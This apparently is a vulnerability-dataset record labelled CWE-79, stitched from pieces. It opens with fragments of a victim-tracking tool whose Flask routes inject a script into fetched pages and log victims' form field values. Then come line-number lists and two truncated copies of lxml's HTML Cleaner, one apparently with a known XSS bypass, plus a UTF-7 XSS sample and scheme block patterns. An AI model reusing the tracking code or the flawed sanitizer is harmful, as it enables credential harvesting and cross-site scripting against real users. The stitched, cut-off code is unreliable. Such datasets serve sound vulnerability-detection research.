utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "+" + utils.Color['white'] + "]" + utils.Color['whiteBold'] + " " + VAR_11 + utils.Color['white'] + " session detected from " + utils.Color['blue'] + VAR_10 + utils.Color['white'] + ' ' + "with ID: " + utils.Color['green'] + VAR_6 + utils.Color['white'])
VAR_9 = int(VAR_2.sentences_victim('count_victim_network', [VAR_6, VAR_11], 3, 0))
if VAR_9 > 0:
VAR_2.sentences_victim('update_network', [VAR_6, VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
else:
VAR_2.sentences_victim('insert_networks', [VAR_6, VAR_10, request.environ['REMOTE_ADDR'], VAR_11, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_6});
@VAR_1.route("/redv")
def FUNC_3():
VAR_12 = request.args.get('url')
VAR_3 = urllib2.build_opener()
VAR_4 = victim_headers()
VAR_3.addheaders = VAR_4
VAR_5 = victim_inject_code(VAR_3.open(VAR_12).read(), 'vscript')
return VAR_5
@VAR_1.route("/regv", methods=["POST"])
def FUNC_4():
VAR_13 = victim_request(request.form['vId'], request.form['site'], request.form['fid'], request.form['name'], request.form['value'], request.form['sId'])
VAR_2.sentences_victim('insert_requests', [VAR_13, time.strftime("%Y-%m-%d - %H:%M:%S")], 2)
utils.Go(utils.Color['white'] + "[" + utils.Color['greenBold'] + "=" + utils.Color['white'] + "]" + " " + 'Receiving data from: ' + utils.Color['green'] + VAR_13.id + utils.Color['white'] + ' ' + 'on' + ' ' + utils.Color['blue'] + VAR_13.site + utils.Color['white'] + '\t\n' + VAR_13.fid + '\t' + VAR_13.name + ':\t' + VAR_13.value)
return json.dumps({'status' : 'OK', 'vId' : VAR_13.id});
@VAR_1.route("/tping", methods=["POST"])
def FUNC_5():
VAR_13 = request.form['id']
VAR_2.sentences_victim('report_online', [VAR_13], 2)
return json.dumps({'status' : 'OK', 'vId' : VAR_13});
| [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
21,
22,
23,
26,
27,
29,
38,
44,
47,
50,
53,
63,
72,
74,
80,
89,
96,
102
] | [
1,
2,
3,
4,
5,
6,
7,
8,
9,
10,
11,
12,
13,
21,
22,
23,
26,
27,
29,
38,
44,
47,
50,
53,
63,
72,
74,
80,
89,
96,
102
] |
1CWE-79
| """A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
import re
import copy
try:
from urlparse import urlsplit
except ImportError:
# Python 3
from urllib.parse import urlsplit
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
bytes
except NameError:
# Python < 2.6
bytes = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_css_javascript_re = re.compile(
r'expression\s*\(.*?\)', re.S|re.I)
# Do I have to worry about @\nimport?
_css_import_re = re.compile(
r'@\s*import', re.I)
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
if _is_image_dataurl(s):
return None
return _is_possibly_malicious_scheme(s)
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: should data: be blocked?
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
"""
Instances cleans the document of each of the possible offending
elements. The cleaning is controlled by attributes; you can
override attributes in a subclass, or set them in the constructor.
``scripts``:
Removes any ``<script>`` tags.
``javascript``:
Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
as they could contain Javascript.
``comments``:
Removes any comments.
``style``:
Removes any style tags.
``inline_style``
Removes any style attributes. Defaults to the value of the ``style`` option.
``links``:
Removes any ``<link>`` tags
``meta``:
Removes any ``<meta>`` tags
``page_structure``:
Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
``processing_instructions``:
Removes any processing instructions.
``embedded``:
Removes any embedded objects (flash, iframes)
``frames``:
Removes any frame-related tags
``forms``:
Removes any form tags
``annoying_tags``:
Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
``remove_tags``:
A list of tags to remove. Only the tags will be removed,
their content will get pulled up into the parent tag.
``kill_tags``:
A list of tags to kill. Killing also removes the tag's content,
i.e. the whole subtree, not just the tag itself.
``allow_tags``:
A list of tags to include (default include all).
``remove_unknown_tags``:
Remove any tags that aren't standard parts of HTML.
``safe_attrs_only``:
If true, only include 'safe' attributes (specifically the list
from the feedparser HTML sanitisation web site).
``safe_attrs``:
A set of attribute names to override the default list of attributes
considered 'safe' (when safe_attrs_only=True).
``add_nofollow``:
If true, then any <a> tags will have ``rel="nofollow"`` added to them.
``host_whitelist``:
A list or set of hosts that you can use for embedded content
(for content like ``<object>``, ``<link rel="stylesheet">``, etc).
You can also implement/override the method
``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
implement more complex rules for what can be embedded.
Anything that passes this test will be shown, regardless of
the value of (for instance) ``embedded``.
Note that this parameter might not work as intended if you do not
make the links absolute before doing the cleaning.
Note that you may also need to set ``whitelist_tags``.
``whitelist_tags``:
A set of tags that can be included with ``host_whitelist``.
The default is ``iframe`` and ``embed``; you may wish to
include other tags like ``script``, or you may want to
implement ``allow_embedded_url`` for more control. Set to None to
include all tags.
This modifies the document *in place*.
"""
scripts = True
javascript = True
comments = True
style = False
inline_style = None
links = True
meta = True
page_structure = True
processing_instructions = True
embedded = True
frames = True
forms = True
annoying_tags = True
remove_tags = None
allow_tags = None
kill_tags = None
remove_unknown_tags = True
safe_attrs_only = True
safe_attrs = defs.safe_attrs
add_nofollow = False
host_whitelist = ()
whitelist_tags = set(['iframe', 'embed'])
def __init__(self, **kw):
for name, value in kw.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %s=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in kw:
self.inline_style = self.style
# Used to lookup the primary URL for a given tag that is up for
# removal:
_tag_link_attrs = dict(
script='src',
link='href',
# From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
# From what I can tell, both attributes can contain a link:
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
# FIXME: there doesn't really seem like a general way to figure out what
# links an <object> tag uses; links often go in <param> tags with values
# that we don't really know. You'd have to have knowledge about specific
# kinds of plugins (probably keyed off classid), and match against those.
##object=?,
# FIXME: not looking at the action currently, because it is more complex
# than than -- if you keep the form, you should keep the form controls.
##form='action',
a='href',
)
def __call__(self, doc):
"""
Cleans the document.
"""
if hasattr(doc, 'getroot'):
# ElementTree instance, instead of an element
doc = doc.getroot()
# convert XHTML to HTML
xhtml_to_html(doc)
# Normalize a case that IE treats <image> like <img>, and that
# can confuse either this step or later steps.
for el in doc.iter('image'):
el.tag = 'img'
if not self.comments:
# Of course, if we were going to kill comments anyway, we don't
# need to worry about this
self.kill_conditional_comments(doc)
kill_tags = set(self.kill_tags or ())
remove_tags = set(self.remove_tags or ())
allow_tags = set(self.allow_tags or ())
if self.scripts:
kill_tags.add('script')
if self.safe_attrs_only:
safe_attrs = set(self.safe_attrs)
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname not in safe_attrs:
del attrib[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
# safe_attrs handles events attributes itself
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname.startswith('on'):
del attrib[aname]
doc.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
# If we're deleting style then we don't have to remove JS links
# from styles, otherwise...
if not self.inline_style:
for el in _find_styled_elements(doc):
old = el.get('style')
new = _css_javascript_re.sub('', old)
new = _css_import_re.sub('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
del el.attrib['style']
elif new != old:
el.set('style', new)
if not self.style:
for el in list(doc.iter('style')):
if el.get('type', '').lower().strip() == 'text/javascript':
el.drop_tree()
continue
old = el.text or ''
new = _css_javascript_re.sub('', old)
# The imported CSS can do anything; we just can't allow:
new = _css_import_re.sub('', old)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
el.text = '/* deleted */'
elif new != old:
el.text = new
if self.comments or self.processing_instructions:
# FIXME: why either? I feel like there's some obscure reason
# because you can put PIs in comments...? But I've already
# forgotten it
kill_tags.add(etree.Comment)
if self.processing_instructions:
kill_tags.add(etree.ProcessingInstruction)
if self.style:
kill_tags.add('style')
if self.inline_style:
etree.strip_attributes(doc, 'style')
if self.links:
kill_tags.add('link')
elif self.style or self.javascript:
# We must get rid of included stylesheets if Javascript is not
# allowed, as you can put Javascript in them
for el in list(doc.iter('link')):
if 'stylesheet' in el.get('rel', '').lower():
# Note this kills alternate stylesheets as well
if not self.allow_element(el):
el.drop_tree()
if self.meta:
kill_tags.add('meta')
if self.page_structure:
remove_tags.update(('head', 'html', 'title'))
if self.embedded:
# FIXME: is <layer> really embedded?
# We should get rid of any <param> tags not inside <applet>;
# These are not really valid anyway.
for el in list(doc.iter('param')):
found_parent = False
parent = el.getparent()
while parent is not None and parent.tag not in ('applet', 'object'):
parent = parent.getparent()
if parent is None:
el.drop_tree()
kill_tags.update(('applet',))
# The alternate contents that are in an iframe are a good fallback:
remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
# FIXME: ideally we should look at the frame links, but
# generally frames don't mix properly with an HTML
# fragment anyway.
kill_tags.update(defs.frame_tags)
if self.forms:
remove_tags.add('form')
kill_tags.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
remove_tags.update(('blink', 'marquee'))
_remove = []
_kill = []
for el in doc.iter():
if el.tag in kill_tags:
if self.allow_element(el):
continue
_kill.append(el)
elif el.tag in remove_tags:
if self.allow_element(el):
continue
_remove.append(el)
if _remove and _remove[0] == doc:
# We have to drop the parent-most tag, which we can't
# do. Instead we'll rewrite it:
el = _remove.pop(0)
el.tag = 'div'
el.attrib.clear()
elif _kill and _kill[0] == doc:
# We have to drop the parent-most element, which we can't
# do. Instead we'll clear it:
el = _kill.pop(0)
if el.tag != 'html':
el.tag = 'div'
el.clear()
_kill.reverse() # start with innermost tags
for el in _kill:
el.drop_tree()
for el in _remove:
el.drop_tag()
if self.remove_unknown_tags:
if allow_tags:
raise ValueError(
"It does not make sense to pass in both allow_tags and remove_unknown_tags")
allow_tags = set(defs.tags)
if allow_tags:
bad = []
for el in doc.iter():
if el.tag not in allow_tags:
bad.append(el)
if bad:
if bad[0] is doc:
el = bad.pop(0)
el.tag = 'div'
el.attrib.clear()
for el in bad:
el.drop_tag()
if self.add_nofollow:
for el in _find_external_links(doc):
if not self.allow_follow(el):
rel = el.get('rel')
if rel:
if ('nofollow' in rel
and ' nofollow ' in (' %s ' % rel)):
continue
rel = '%s nofollow' % rel
else:
rel = 'nofollow'
el.set('rel', rel)
def allow_follow(self, anchor):
"""
Override to suppress rel="nofollow" on some anchors.
"""
return False
def allow_element(self, el):
if el.tag not in self._tag_link_attrs:
return False
attr = self._tag_link_attrs[el.tag]
if isinstance(attr, (list, tuple)):
for one_attr in attr:
url = el.get(one_attr)
if not url:
return False
if not self.allow_embedded_url(el, url):
return False
return True
else:
url = el.get(attr)
if not url:
return False
return self.allow_embedded_url(el, url)
def allow_embedded_url(self, el, url):
if (self.whitelist_tags is not None
and el.tag not in self.whitelist_tags):
return False
scheme, netloc, path, query, fragment = urlsplit(url)
netloc = netloc.lower().split(':', 1)[0]
if scheme not in ('http', 'https'):
return False
if netloc in self.host_whitelist:
return True
return False
def kill_conditional_comments(self, doc):
"""
IE conditional comments basically embed HTML that the parser
doesn't normally see. We can't allow anything like that, so
we'll kill any comments that could be conditional.
"""
bad = []
self._kill_elements(
doc, lambda el: _conditional_comment_re.search(el.text),
etree.Comment)
def _kill_elements(self, doc, condition, iterate=None):
bad = []
for el in doc.iter(iterate):
if condition(el):
bad.append(el)
for el in bad:
el.drop_tree()
def _remove_javascript_link(self, link):
# links like "j a v a s c r i p t:" might be interpreted in IE
new = _substitute_whitespace('', link)
if _is_javascript_scheme(new):
# FIXME: should this be None to delete?
return ''
return link
_substitute_comments = re.compile(r'/\*.*?\*/', re.S).sub
def _has_sneaky_javascript(self, style):
"""
Depending on the browser, stuff like ``e x p r e s s i o n(...)``
can get interpreted, or ``expre/* stuff */ssion(...)``. This
checks for attempt to do stuff like this.
Typically the response will be to kill the entire style; if you
have just a bit of Javascript in the style another rule will catch
that and remove only the Javascript from the style; this catches
more sneaky attempts.
"""
style = self._substitute_comments('', style)
style = style.replace('\\', '')
style = _substitute_whitespace('', style)
style = style.lower()
if 'javascript:' in style:
return True
if 'expression(' in style:
return True
return False
def clean_html(self, html):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
self(doc)
return _transform_result(result_type, doc)
clean = Cleaner()
clean_html = clean.clean_html
############################################################
## Autolinking
############################################################
_link_regexes = [
re.compile(r'(?P<body>https?://(?P<host>[a-z0-9._-]+)(?:/[/\-_.,a-z0-9%&?;=~]*)?(?:\([/\-_.,a-z0-9%&?;=~]*\))?)', re.I),
# This is conservative, but autolinking can be a bit conservative:
re.compile(r'mailto:(?P<body>[a-z0-9._-]+@(?P<host>[a-z0-9_.-]+[a-z]))', re.I),
]
_avoid_elements = ['textarea', 'pre', 'code', 'head', 'select', 'a']
_avoid_hosts = [
re.compile(r'^localhost', re.I),
re.compile(r'\bexample\.(?:com|org|net)$', re.I),
re.compile(r'^127\.0\.0\.1$'),
]
_avoid_classes = ['nolink']
def autolink(el, link_regexes=_link_regexes,
avoid_elements=_avoid_elements,
avoid_hosts=_avoid_hosts,
avoid_classes=_avoid_classes):
"""
Turn any URLs into links.
It will search for links identified by the given regular
expressions (by default mailto and http(s) links).
It won't link text in an element in avoid_elements, or an element
with a class in avoid_classes. It won't link to anything with a
host that matches one of the regular expressions in avoid_hosts
(default localhost and 127.0.0.1).
If you pass in an element, the element's tail will not be
substituted, only the contents of the element.
"""
if el.tag in avoid_elements:
return
class_name = el.get('class')
if class_name:
class_name = class_name.split()
for match_class in avoid_classes:
if match_class in class_name:
return
for child in list(el):
autolink(child, link_regexes=link_regexes,
avoid_elements=avoid_elements,
avoid_hosts=avoid_hosts,
avoid_classes=avoid_classes)
if child.tail:
text, tail_children = _link_text(
child.tail, link_regexes, avoid_hosts, factory=el.makeelement)
if tail_children:
child.tail = text
index = el.index(child)
el[index+1:index+1] = tail_children
if el.text:
text, pre_children = _link_text(
el.text, link_regexes, avoid_hosts, factory=el.makeelement)
if pre_children:
el.text = text
el[:0] = pre_children
def _link_text(text, link_regexes, avoid_hosts, factory):
leading_text = ''
links = []
last_pos = 0
while 1:
best_match, best_pos = None, None
for regex in link_regexes:
regex_pos = last_pos
while 1:
match = regex.search(text, pos=regex_pos)
if match is None:
break
host = match.group('host')
for host_regex in avoid_hosts:
if host_regex.search(host):
regex_pos = match.end()
break
else:
break
if match is None:
continue
if best_pos is None or match.start() < best_pos:
best_match = match
best_pos = match.start()
if best_match is None:
# No more matches
if links:
assert not links[-1].tail
links[-1].tail = text
else:
assert not leading_text
leading_text = text
break
link = best_match.group(0)
end = best_match.end()
if link.endswith('.') or link.endswith(','):
# These punctuation marks shouldn't end a link
end -= 1
link = link[:-1]
prev_text = text[:best_match.start()]
if links:
assert not links[-1].tail
links[-1].tail = prev_text
else:
assert not leading_text
leading_text = prev_text
anchor = factory('a')
anchor.set('href', link)
body = best_match.group('body')
if not body:
body = link
if body.endswith('.') or body.endswith(','):
body = body[:-1]
anchor.text = body
links.append(anchor)
text = text[end:]
return leading_text, links
def autolink_html(html, *args, **kw):
result_type = type(html)
if isinstance(html, basestring):
doc = fromstring(html)
else:
doc = copy.deepcopy(html)
autolink(doc, *args, **kw)
return _transform_result(result_type, doc)
autolink_html.__doc__ = autolink.__doc__
############################################################
## Word wrapping
############################################################
_avoid_word_break_elements = ['pre', 'textarea', 'code']
_avoid_word_break_classes = ['nobreak']
def word_break(el, max_width=40,
avoid_elements=_avoid_word_break_elements,
avoid_classes=_avoid_word_break_classes,
break_character=unichr(0x200b)):
"""
Breaks any long words found in the body of the text (not attributes).
Doesn't effect any of the tags in avoid_elements, by default
``<textarea>`` and ``<pre>``
Breaks words by inserting ​, which is a unicode character
for Zero Width Space character. This generally takes up no space
in rendering, but does copy as a space, and in monospace contexts
usually takes up space.
See http://www.cs.tut.fi/~jkorpela/html/nobr.html for a discussion
"""
# Character suggestion of ​ comes from:
# http://www.cs.tut.fi/~jkorpela/html/nobr.html
if el.tag in _avoid_word_break_elements:
return
class_name = el.get('class')
if class_name:
dont_break = False
class_name = class_name.split()
for avoid in avoid_classes:
if avoid in class_name:
dont_break = True
break
if dont_break:
return
if el.text:
el.text = _break_text(el.text, max_width, break_character)
for child in el:
word_break(child, max_width=max_width,
avoid_elements=avoid_elements,
avoid_classes=avoid_classes,
break_character=break_character)
if child.tail:
child.tail = _break_text(child.tail, max_width, break_character)
def word_break_html(html, *args, **kw):
result_type = type(html)
doc = fromstring(html)
word_break(doc, *args, **kw)
return _transform_result(result_type, doc)
def _break_text(text, max_width, break_character):
words = text.split()
for word in words:
if len(word) > max_width:
replacement = _insert_break(word, max_width, break_character)
text = text.replace(word, replacement)
return text
_break_prefer_re = re.compile(r'[^a-z]', re.I)
def _insert_break(word, width, break_character):
orig_word = word
result = ''
while len(word) > width:
start = word[:width]
breaks = list(_break_prefer_re.finditer(start))
if breaks:
last_break = breaks[-1]
# Only walk back up to 10 characters to find a nice break:
if last_break.end() > width-10:
# FIXME: should the break character be at the end of the
# chunk, or the beginning of the next chunk?
start = word[:last_break.end()]
result += start + break_character
word = word[len(start):]
result += word
return result
| """A cleanup tool for HTML.
Removes unwanted tags and content. See the `Cleaner` class for
details.
"""
import re
import copy
try:
from urlparse import urlsplit
from urllib import unquote_plus
except ImportError:
# Python 3
from urllib.parse import urlsplit, unquote_plus
from lxml import etree
from lxml.html import defs
from lxml.html import fromstring, XHTML_NAMESPACE
from lxml.html import xhtml_to_html, _transform_result
try:
unichr
except NameError:
# Python 3
unichr = chr
try:
unicode
except NameError:
# Python 3
unicode = str
try:
bytes
except NameError:
# Python < 2.6
bytes = str
try:
basestring
except NameError:
basestring = (str, bytes)
__all__ = ['clean_html', 'clean', 'Cleaner', 'autolink', 'autolink_html',
'word_break', 'word_break_html']
# Look at http://code.sixapart.com/trac/livejournal/browser/trunk/cgi-bin/cleanhtml.pl
# Particularly the CSS cleaning; most of the tag cleaning is integrated now
# I have multiple kinds of schemes searched; but should schemes be
# whitelisted instead?
# max height?
# remove images? Also in CSS? background attribute?
# Some way to whitelist object, iframe, etc (e.g., if you want to
# allow *just* embedded YouTube movies)
# Log what was deleted and why?
# style="behavior: ..." might be bad in IE?
# Should we have something for just <meta http-equiv>? That's the worst of the
# metas.
# UTF-7 detections? Example:
# <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
# you don't always have to have the charset set, if the page has no charset
# and there's UTF7-like code in it.
# Look at these tests: http://htmlpurifier.org/live/smoketests/xssAttacks.php
# This is an IE-specific construct you can have in a stylesheet to
# run some Javascript:
_css_javascript_re = re.compile(
r'expression\s*\(.*?\)', re.S|re.I)
# Do I have to worry about @\nimport?
_css_import_re = re.compile(
r'@\s*import', re.I)
# All kinds of schemes besides just javascript: that can cause
# execution:
_is_image_dataurl = re.compile(
r'^data:image/.+;base64', re.I).search
_is_possibly_malicious_scheme = re.compile(
r'(?:javascript|jscript|livescript|vbscript|data|about|mocha):',
re.I).search
def _is_javascript_scheme(s):
if _is_image_dataurl(s):
return None
return _is_possibly_malicious_scheme(s)
_substitute_whitespace = re.compile(r'[\s\x00-\x08\x0B\x0C\x0E-\x19]+').sub
# FIXME: should data: be blocked?
# FIXME: check against: http://msdn2.microsoft.com/en-us/library/ms537512.aspx
_conditional_comment_re = re.compile(
r'\[if[\s\n\r]+.*?][\s\n\r]*>', re.I|re.S)
_find_styled_elements = etree.XPath(
"descendant-or-self::*[@style]")
_find_external_links = etree.XPath(
("descendant-or-self::a [normalize-space(@href) and substring(normalize-space(@href),1,1) != '#'] |"
"descendant-or-self::x:a[normalize-space(@href) and substring(normalize-space(@href),1,1) != '#']"),
namespaces={'x':XHTML_NAMESPACE})
class Cleaner(object):
"""
Instances cleans the document of each of the possible offending
elements. The cleaning is controlled by attributes; you can
override attributes in a subclass, or set them in the constructor.
``scripts``:
Removes any ``<script>`` tags.
``javascript``:
Removes any Javascript, like an ``onclick`` attribute. Also removes stylesheets
as they could contain Javascript.
``comments``:
Removes any comments.
``style``:
Removes any style tags.
``inline_style``
Removes any style attributes. Defaults to the value of the ``style`` option.
``links``:
Removes any ``<link>`` tags
``meta``:
Removes any ``<meta>`` tags
``page_structure``:
Structural parts of a page: ``<head>``, ``<html>``, ``<title>``.
``processing_instructions``:
Removes any processing instructions.
``embedded``:
Removes any embedded objects (flash, iframes)
``frames``:
Removes any frame-related tags
``forms``:
Removes any form tags
``annoying_tags``:
Tags that aren't *wrong*, but are annoying. ``<blink>`` and ``<marquee>``
``remove_tags``:
A list of tags to remove. Only the tags will be removed,
their content will get pulled up into the parent tag.
``kill_tags``:
A list of tags to kill. Killing also removes the tag's content,
i.e. the whole subtree, not just the tag itself.
``allow_tags``:
A list of tags to include (default include all).
``remove_unknown_tags``:
Remove any tags that aren't standard parts of HTML.
``safe_attrs_only``:
If true, only include 'safe' attributes (specifically the list
from the feedparser HTML sanitisation web site).
``safe_attrs``:
A set of attribute names to override the default list of attributes
considered 'safe' (when safe_attrs_only=True).
``add_nofollow``:
If true, then any <a> tags will have ``rel="nofollow"`` added to them.
``host_whitelist``:
A list or set of hosts that you can use for embedded content
(for content like ``<object>``, ``<link rel="stylesheet">``, etc).
You can also implement/override the method
``allow_embedded_url(el, url)`` or ``allow_element(el)`` to
implement more complex rules for what can be embedded.
Anything that passes this test will be shown, regardless of
the value of (for instance) ``embedded``.
Note that this parameter might not work as intended if you do not
make the links absolute before doing the cleaning.
Note that you may also need to set ``whitelist_tags``.
``whitelist_tags``:
A set of tags that can be included with ``host_whitelist``.
The default is ``iframe`` and ``embed``; you may wish to
include other tags like ``script``, or you may want to
implement ``allow_embedded_url`` for more control. Set to None to
include all tags.
This modifies the document *in place*.
"""
scripts = True
javascript = True
comments = True
style = False
inline_style = None
links = True
meta = True
page_structure = True
processing_instructions = True
embedded = True
frames = True
forms = True
annoying_tags = True
remove_tags = None
allow_tags = None
kill_tags = None
remove_unknown_tags = True
safe_attrs_only = True
safe_attrs = defs.safe_attrs
add_nofollow = False
host_whitelist = ()
whitelist_tags = set(['iframe', 'embed'])
def __init__(self, **kw):
for name, value in kw.items():
if not hasattr(self, name):
raise TypeError(
"Unknown parameter: %s=%r" % (name, value))
setattr(self, name, value)
if self.inline_style is None and 'inline_style' not in kw:
self.inline_style = self.style
# Used to lookup the primary URL for a given tag that is up for
# removal:
_tag_link_attrs = dict(
script='src',
link='href',
# From: http://java.sun.com/j2se/1.4.2/docs/guide/misc/applet.html
# From what I can tell, both attributes can contain a link:
applet=['code', 'object'],
iframe='src',
embed='src',
layer='src',
# FIXME: there doesn't really seem like a general way to figure out what
# links an <object> tag uses; links often go in <param> tags with values
# that we don't really know. You'd have to have knowledge about specific
# kinds of plugins (probably keyed off classid), and match against those.
##object=?,
# FIXME: not looking at the action currently, because it is more complex
# than than -- if you keep the form, you should keep the form controls.
##form='action',
a='href',
)
def __call__(self, doc):
"""
Cleans the document.
"""
if hasattr(doc, 'getroot'):
# ElementTree instance, instead of an element
doc = doc.getroot()
# convert XHTML to HTML
xhtml_to_html(doc)
# Normalize a case that IE treats <image> like <img>, and that
# can confuse either this step or later steps.
for el in doc.iter('image'):
el.tag = 'img'
if not self.comments:
# Of course, if we were going to kill comments anyway, we don't
# need to worry about this
self.kill_conditional_comments(doc)
kill_tags = set(self.kill_tags or ())
remove_tags = set(self.remove_tags or ())
allow_tags = set(self.allow_tags or ())
if self.scripts:
kill_tags.add('script')
if self.safe_attrs_only:
safe_attrs = set(self.safe_attrs)
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname not in safe_attrs:
del attrib[aname]
if self.javascript:
if not (self.safe_attrs_only and
self.safe_attrs == defs.safe_attrs):
# safe_attrs handles events attributes itself
for el in doc.iter(etree.Element):
attrib = el.attrib
for aname in attrib.keys():
if aname.startswith('on'):
del attrib[aname]
doc.rewrite_links(self._remove_javascript_link,
resolve_base_href=False)
# If we're deleting style then we don't have to remove JS links
# from styles, otherwise...
if not self.inline_style:
for el in _find_styled_elements(doc):
old = el.get('style')
new = _css_javascript_re.sub('', old)
new = _css_import_re.sub('', new)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
del el.attrib['style']
elif new != old:
el.set('style', new)
if not self.style:
for el in list(doc.iter('style')):
if el.get('type', '').lower().strip() == 'text/javascript':
el.drop_tree()
continue
old = el.text or ''
new = _css_javascript_re.sub('', old)
# The imported CSS can do anything; we just can't allow:
new = _css_import_re.sub('', old)
if self._has_sneaky_javascript(new):
# Something tricky is going on...
el.text = '/* deleted */'
elif new != old:
el.text = new
if self.comments or self.processing_instructions:
# FIXME: why either? I feel like there's some obscure reason
# because you can put PIs in comments...? But I've already
# forgotten it
kill_tags.add(etree.Comment)
if self.processing_instructions:
kill_tags.add(etree.ProcessingInstruction)
if self.style:
kill_tags.add('style')
if self.inline_style:
etree.strip_attributes(doc, 'style')
if self.links:
kill_tags.add('link')
elif self.style or self.javascript:
# We must get rid of included stylesheets if Javascript is not
# allowed, as you can put Javascript in them
for el in list(doc.iter('link')):
if 'stylesheet' in el.get('rel', '').lower():
# Note this kills alternate stylesheets as well
if not self.allow_element(el):
el.drop_tree()
if self.meta:
kill_tags.add('meta')
if self.page_structure:
remove_tags.update(('head', 'html', 'title'))
if self.embedded:
# FIXME: is <layer> really embedded?
# We should get rid of any <param> tags not inside <applet>;
# These are not really valid anyway.
for el in list(doc.iter('param')):
found_parent = False
parent = el.getparent()
while parent is not None and parent.tag not in ('applet', 'object'):
parent = parent.getparent()
if parent is None:
el.drop_tree()
kill_tags.update(('applet',))
# The alternate contents that are in an iframe are a good fallback:
remove_tags.update(('iframe', 'embed', 'layer', 'object', 'param'))
if self.frames:
# FIXME: ideally we should look at the frame links, but
# generally frames don't mix properly with an HTML
# fragment anyway.
kill_tags.update(defs.frame_tags)
if self.forms:
remove_tags.add('form')
kill_tags.update(('button', 'input', 'select', 'textarea'))
if self.annoying_tags:
remove_tags.update(('blink', 'marquee'))
_remove = []
_kill = []
for el in doc.iter():
if el.tag in kill_tags:
if self.allow_element(el):
continue
_kill.append(el)
elif el.tag in remove_tags:
if self.allow_element(el):
continue
_remove.append(el)
if _remove and _remove[0] == doc:
# We have to drop the parent-most tag, which we can't
# do. Instead we'll rewrite it:
el = _remove.pop(0)
el.tag = 'div'
el.attrib.clear()
elif _kill and _kill[0] == doc:
# We have to drop the parent-most element, which we can't
# do. Instead we'll clear it:
el = _kill.pop(0)
if el.tag != 'html':
el.tag = 'div'
el.clear()
_kill.reverse() # start with innermost tags
for el in _kill:
el.drop_tree()
for el in _remove:
el.drop_tag()
if self.remove_unknown_tags:
if allow_tags:
raise ValueError(
"It does not make sense to pass in both allow_tags and remove_unknown_tags")
allow_tags = set(defs.tags)
if allow_tags:
bad = []
for el in doc.iter():
if el.tag not in allow_tags:
bad.append(el)
if bad:
if bad[0] is doc:
el = bad.pop(0)
el.tag = 'div'
el.attrib.clear()
for el in bad:
el.drop_tag()
if self.add_nofollow:
for el in _find_external_links(doc):
if not self.allow_follow(el):
rel = el.get('rel')
if rel:
if ('nofollow' in rel
and ' nofollow ' in (' %s ' % rel)):
continue
rel = '%s nofollow' % rel
else:
rel = 'nofollow'
el.set('rel', rel)
def allow_follow(self, anchor):
"""
Override to suppress rel="nofollow" on some anchors.
"""
return False
def allow_element(self, el):
if el.tag not in self._tag_link_attrs:
